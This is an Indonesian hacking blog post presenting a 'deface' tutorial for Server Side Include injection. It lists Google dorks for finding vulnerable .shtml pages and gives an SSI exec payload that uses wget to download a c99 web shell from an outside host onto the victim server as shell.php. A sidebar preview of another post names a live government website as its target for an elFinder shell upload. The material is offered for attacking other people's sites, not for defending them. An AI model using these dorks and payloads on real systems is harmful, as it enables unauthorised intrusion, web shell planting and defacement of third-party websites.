Skip to main content

Tutorial Deface Dengan Cara Server Side Include Injection (SSI Injection)

Dan hari ini gw ingin share POC Deface Dengan Cara Server Side Include Injection (SSI Injection)

Lalu apa itu SSI Injection
Gw jelasin sedikit apa itu SSI Injection

Server Side Includes (SSI) adalah bahasa server untuk halaman web, yang dirancang untuk membuat halaman HTML statis sedikit lebih dinamis.
SSI bermaksud membuat halaman HTML mirip dengan aplikasi dinamis, seperti yang ditulis dalam ASP, PHP dan bahasa yang serupa dan memungkinkan penyertaan server informasi dinamis di halaman HTML. Halaman HTML dengan tag SSI biasanya memiliki ekstensi shtml atau shtm.

Penggunaan SSI yang paling umum adalah termasuk konten file ke dalam halaman web dari server web.


DORK

inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=


Gw menemukan halaman ini dan memasukkan nama pengguna gw sebagai Sylar:




Kita dapat melihat pada gambar di atas bahwa nama pengguna yang kita masukkan telah ditampilkan di layar setelah kami mengirim data dan halaman dengan ekstensi shtml, jadi menurut lo apa yang akan terjadi jika gw memasukkan nama pengguna gw sebagai:

<!--#echo var="HTTP_USER_AGENT" -->

Lalu akan muncul ini




Sekarang gw akan mencoba memasukkan kode berikut sebagai nama pengguna:

<!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" -->

Kalau berhasil akan muncul seprti ini


The command executed successfully
Sekarang kita lihat shell kita
akses shellnya? site.com/shell.php


Ok cukup mudah bukan? XD

Ok guys cukup sekian, soalnya admin mau lebaran dulu sama teman teman, keluarga dll nya :)

Comments

Popular posts from this blog

Benner Online Shop CDR / Toko Online Elegan CDR 100% Free

Benner Online Shop/ Toko Online Elegan 100% Free - Bagi anda yang memiliki toko online/online shop dan bingung untuk membuat bennernya, disini kami sajikan contoh benner online shop. benner online shope yang kami bagikan ini adalah benner yang di desain tim desainer kami untuk anda. contoh ini dapat menjadi referensi. dan jika anda membutuhkan file CDRnya anda dapat mengunduhnya pada link yang admin buat di akhir artikel ini. setelah anda mengunduh file CDRnya silahkan di edit sesuai nama online shop anda dengan menggunkan CorelDraw. Sesuai dengan judul yaitu Benner Online Shop/ Toko Online Elegan CDR 100% Free bahwa kami membagikannya secara gratis. jadi bagi yang berminat silahkan di download. berikut adalah contoh benner online shop yang kami maksud. Contoh 1 benner online Shop Contoh 2 benner online Shop    Contoh 3 benner online Shop Itulah contoh benner online shop yang dapat kami bagikan, kami berharap contoh diatas dapat mewakili kebutuhan anda. jika anda ingin re...

Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema

Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema Written by Muhamad Hamdan on Wen March 5th 2014 Assalamu'Alaikum Sahabat Semua,Dua Minggu yang lalu kita pernah Membikin Artikel bagaimana cara Memperbaiki Missing required field "updated" Dan hCard "author" Mereka yang telah melihat artikel tadi pasti sudah valid kalau Dia mengikuti petunjuknya,Tetapi walaupun itu sudah valid untuk menggunakan rich snippets untuk google webmasters tools, Sebagian besar suka menemukan Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema di karenakan dari kesalahan property yang bukan schema markup. Nah sekarang untuk melanjutkan dengan cara Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema Anda perlu bantuan d...

Tutorial Deface elFinder + Upload Shell

Naufal Ardhani - Hallo gaess kali ini gua bakal bagiin  Tutorial Deface elFinder + Upload Shell , Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v dan pas gua lagi Pentest web  http://labuankec.pandeglangkab.go.id/  gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel. Dork : inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln ) Exploit : www.site.com/[path] /elfinder/elfinder.php.html Live Target :  http://labuankec.pandeglangkab.go.id/ Step : Dorking di google, pilih target dan kasih exploit satu satu dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts /elfinder/elfinder.php.html Langsung aja Upload Shell dengan ekstensi .phtml  lalu Akses deh Shellnya di www.site.com/[path] /elfinder/files/oxy.phtml Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya. nb : saya ...